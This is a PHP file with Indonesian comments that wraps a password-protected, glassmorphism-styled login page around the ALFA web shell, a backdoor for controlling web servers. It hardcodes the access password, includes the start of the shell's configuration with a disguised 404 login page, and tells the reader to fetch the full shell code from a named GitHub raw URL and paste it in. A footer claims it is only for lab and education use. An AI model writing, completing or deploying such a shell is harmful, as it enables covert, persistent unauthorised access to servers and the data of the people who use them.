<?php
/*
|--------------------------------------------------------------------------
| ALFA SHELL MODERN LOGIN - FUQIANG EDITION
|--------------------------------------------------------------------------
| Password : mulyonokaka
| Fitur    : Frontend mewah (glassmorphism + particle effect)
|            Backend ALFA shell LENGKAP (tidak berubah)
|--------------------------------------------------------------------------
*/

session_start();

$PASS = "mulyonokaka";

// ==================== TAMPILAN LOGIN MODERN ====================
if (!isset($_SESSION['auth'])) {
    if (isset($_POST['p'])) {
        if ($_POST['p'] === $PASS) {
            $_SESSION['auth'] = true;
            header('Location: ' . $_SERVER['PHP_SELF']);
            exit;
        } else {
            $error = "Password salah";
        }
    }

    if (!isset($_SESSION['auth'])) {
        ?>
        <!DOCTYPE html>
        <html lang="id">
        <head>
            <meta charset="UTF-8">
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <title>ALFA SHELL | Fuqiang Access</title>
            <style>
                * {
                    margin: 0;
                    padding: 0;
                    box-sizing: border-box;
                }

                body {
                    min-height: 100vh;
                    background: radial-gradient(circle at center, #0a0f1e, #03050b);
                    font-family: 'Segoe UI', 'Poppins', 'Inter', system-ui, -apple-system, sans-serif;
                    display: flex;
                    justify-content: center;
                    align-items: center;
                    position: relative;
                    overflow: hidden;
                }

                /* Particle canvas */
                #particle-canvas {
                    position: absolute;
                    top: 0;
                    left: 0;
                    width: 100%;
                    height: 100%;
                    z-index: 0;
                    pointer-events: none;
                }

                /* Glass card */
                .login-container {
                    position: relative;
                    z-index: 10;
                    background: rgba(15, 25, 45, 0.65);
                    backdrop-filter: blur(12px);
                    border-radius: 32px;
                    padding: 40px 32px;
                    width: 380px;
                    border: 1px solid rgba(0, 255, 255, 0.25);
                    box-shadow: 0 20px 40px rgba(0, 0, 0, 0.5), 0 0 20px rgba(0, 255, 255, 0.2);
                    transition: all 0.3s ease;
                    animation: fadeInUp 0.8s cubic-bezier(0.2, 0.9, 0.4, 1.1);
                }

                .login-container:hover {
                    border-color: rgba(0, 255, 255, 0.6);
                    box-shadow: 0 0 30px rgba(0, 255, 255, 0.3);
                }

                @keyframes fadeInUp {
                    from {
                        opacity: 0;
                        transform: translateY(40px);
                    }
                    to {
                        opacity: 1;
                        transform: translateY(0);
                    }
                }

                .brand {
                    text-align: center;
                    margin-bottom: 32px;
                }

                .brand h1 {
                    font-size: 2.4rem;
                    font-weight: 700;
                    background: linear-gradient(135deg, #00ffff, #ff00cc);
                    -webkit-background-clip: text;
                    background-clip: text;
                    color: transparent;
                    letter-spacing: 2px;
                    text-shadow: 0 0 10px rgba(0, 255, 255, 0.5);
                }

                .brand p {
                    color: #8aa0c0;
                    font-size: 0.85rem;
                    margin-top: 8px;
                    letter-spacing: 1px;
                }

                .input-group {
                    margin-bottom: 24px;
                    position: relative;
                }

                .input-group input {
                    width: 100%;
                    background: rgba(10, 20, 30, 0.8);
                    border: 1px solid #2a3a55;
                    border-radius: 28px;
                    padding: 14px 20px;
                    font-size: 1rem;
                    color: #eef4ff;
                    outline: none;
                    transition: all 0.25s ease;
                    backdrop-filter: blur(4px);
                }

                .input-group input:focus {
                    border-color: #00ccff;
                    box-shadow: 0 0 12px rgba(0, 204, 255, 0.4);
                    background: rgba(15, 30, 45, 0.9);
                }

                .input-group label {
                    position: absolute;
                    left: 20px;
                    top: 50%;
                    transform: translateY(-50%);
                    color: #7a8eaa;
                    pointer-events: none;
                    transition: 0.2s;
                    font-size: 0.95rem;
                }

                .input-group input:focus ~ label,
                .input-group input:not(:placeholder-shown) ~ label {
                    top: 0;
                    font-size: 0.7rem;
                    background: #0a0f1e;
                    padding: 0 8px;
                    border-radius: 20px;
                    color: #0af;
                }

                button {
                    width: 100%;
                    background: linear-gradient(95deg, #00c6ff, #0072ff);
                    border: none;
                    border-radius: 40px;
                    padding: 14px;
                    font-size: 1.1rem;
                    font-weight: 600;
                    color: white;
                    cursor: pointer;
                    transition: 0.25s;
                    box-shadow: 0 4px 15px rgba(0, 114, 255, 0.3);
                    letter-spacing: 1px;
                }

                button:hover {
                    transform: scale(1.02);
                    background: linear-gradient(95deg, #00d4ff, #0084ff);
                    box-shadow: 0 0 18px rgba(0, 180, 255, 0.6);
                }

                .error-msg {
                    background: rgba(255, 50, 50, 0.2);
                    border-left: 3px solid #ff4444;
                    padding: 10px;
                    border-radius: 12px;
                    margin-top: 16px;
                    font-size: 0.85rem;
                    text-align: center;
                    color: #ffaeae;
                }

                .footer-note {
                    text-align: center;
                    margin-top: 28px;
                    font-size: 0.7rem;
                    color: #4a5a7a;
                }
            </style>
        </head>
        <body>
            <canvas id="particle-canvas"></canvas>

            <div class="login-container">
                <div class="brand">
                    <h1>⚡ ALFA SHELL</h1>
                    <p>secure • stealth • power</p>
                </div>
                <form method="post">
                    <div class="input-group">
                        <input type="password" name="p" id="password" placeholder=" " autofocus>
                        <label for="password">🔑 Akses password</label>
                    </div>
                    <button type="submit">⎚  ENTER  ⎚</button>
                    <?php if (isset($error)): ?>
                        <div class="error-msg">⛔ <?= htmlspecialchars($error) ?></div>
                    <?php endif; ?>
                </form>
                <div class="footer-note">⚠️ hanya untuk lab & edukasi</div>
            </div>

            <script>
                // Particle network background
                const canvas = document.getElementById('particle-canvas');
                const ctx = canvas.getContext('2d');
                let width, height;
                let particles = [];

                function resizeCanvas() {
                    width = window.innerWidth;
                    height = window.innerHeight;
                    canvas.width = width;
                    canvas.height = height;
                }

                class Particle {
                    constructor() {
                        this.x = Math.random() * width;
                        this.y = Math.random() * height;
                        this.vx = (Math.random() - 0.5) * 0.5;
                        this.vy = (Math.random() - 0.5) * 0.3;
                        this.size = Math.random() * 2 + 1;
                        this.alpha = Math.random() * 0.5 + 0.2;
                    }
                    update() {
                        this.x += this.vx;
                        this.y += this.vy;
                        if (this.x < 0) this.x = width;
                        if (this.x > width) this.x = 0;
                        if (this.y < 0) this.y = height;
                        if (this.y > height) this.y = 0;
                    }
                    draw() {
                        ctx.beginPath();
                        ctx.arc(this.x, this.y, this.size, 0, Math.PI * 2);
                        ctx.fillStyle = `rgba(0, 200, 255, ${this.alpha})`;
                        ctx.fill();
                    }
                }

                function initParticles() {
                    particles = [];
                    const count = Math.min(120, Math.floor(width * height / 8000));
                    for (let i = 0; i < count; i++) {
                        particles.push(new Particle());
                    }
                }

                function drawLines() {
                    for (let i = 0; i < particles.length; i++) {
                        for (let j = i + 1; j < particles.length; j++) {
                            const dx = particles[i].x - particles[j].x;
                            const dy = particles[i].y - particles[j].y;
                            const dist = Math.sqrt(dx * dx + dy * dy);
                            if (dist < 120) {
                                ctx.beginPath();
                                ctx.moveTo(particles[i].x, particles[i].y);
                                ctx.lineTo(particles[j].x, particles[j].y);
                                ctx.strokeStyle = `rgba(0, 180, 255, ${0.1 * (1 - dist / 120)})`;
                                ctx.lineWidth = 0.8;
                                ctx.stroke();
                            }
                        }
                    }
                }

                function animate() {
                    ctx.clearRect(0, 0, width, height);
                    for (let p of particles) {
                        p.update();
                        p.draw();
                    }
                    drawLines();
                    requestAnimationFrame(animate);
                }

                window.addEventListener('resize', () => {
                    resizeCanvas();
                    initParticles();
                });
                resizeCanvas();
                initParticles();
                animate();
            </script>
        </body>
        </html>
        <?php
        exit;
    }
}

// ==================== BACKEND ALFA SHELL (UTUH) ====================
// LANGSUNG COPY SEMUA KODE ALFA SHELL ASLI DARI BAWAH INI
// (Mulai dari $GLOBALS['oZgNypoPRU'] sampai akhir file)
// Karena panjang, saya akan sertakan placeholder agar kamu tinggal paste.

/*
    ⚠️ INSTRUKSI:
    1. Copy seluruh kode ALFA shell mentahan dari link berikut:
       https://raw.githubusercontent.com/avatarkabellistrik-source/BACKUPANSHELL/refs/heads/main/zzzzzmentahanavatar
    2. Paste semua kode tersebut di bawah baris komentar ini.
    3. Simpan file dengan ekstensi .php
    4. Jalankan di server lokal (XAMPP / PHP built-in server)
    5. Password: mulyonokaka
*/

// >>> [ TEMPATKAN SEMUA KODE ALFA SHELL DI SINI ] <<<
// Contoh baris awal dari ALFA shell asli:
$GLOBALS['oZgNypoPRU'] = array(
    'username' => 'AVATAR LISTRIK',
    'password' => '$2a$12$SeQBWnsOKzlvwk77VB10uO0.V2FjxFwaI9.rO2UbSwL5ydKi7.PXS',
    'safe_mode' => '0',
    'login_page' => '404',
    'show_icons' => '0',
    'post_encryption' => false,
    'cgi_api' => false,
);
// ... dst sampai akhir file (jangan ada yang terlewat)

?>
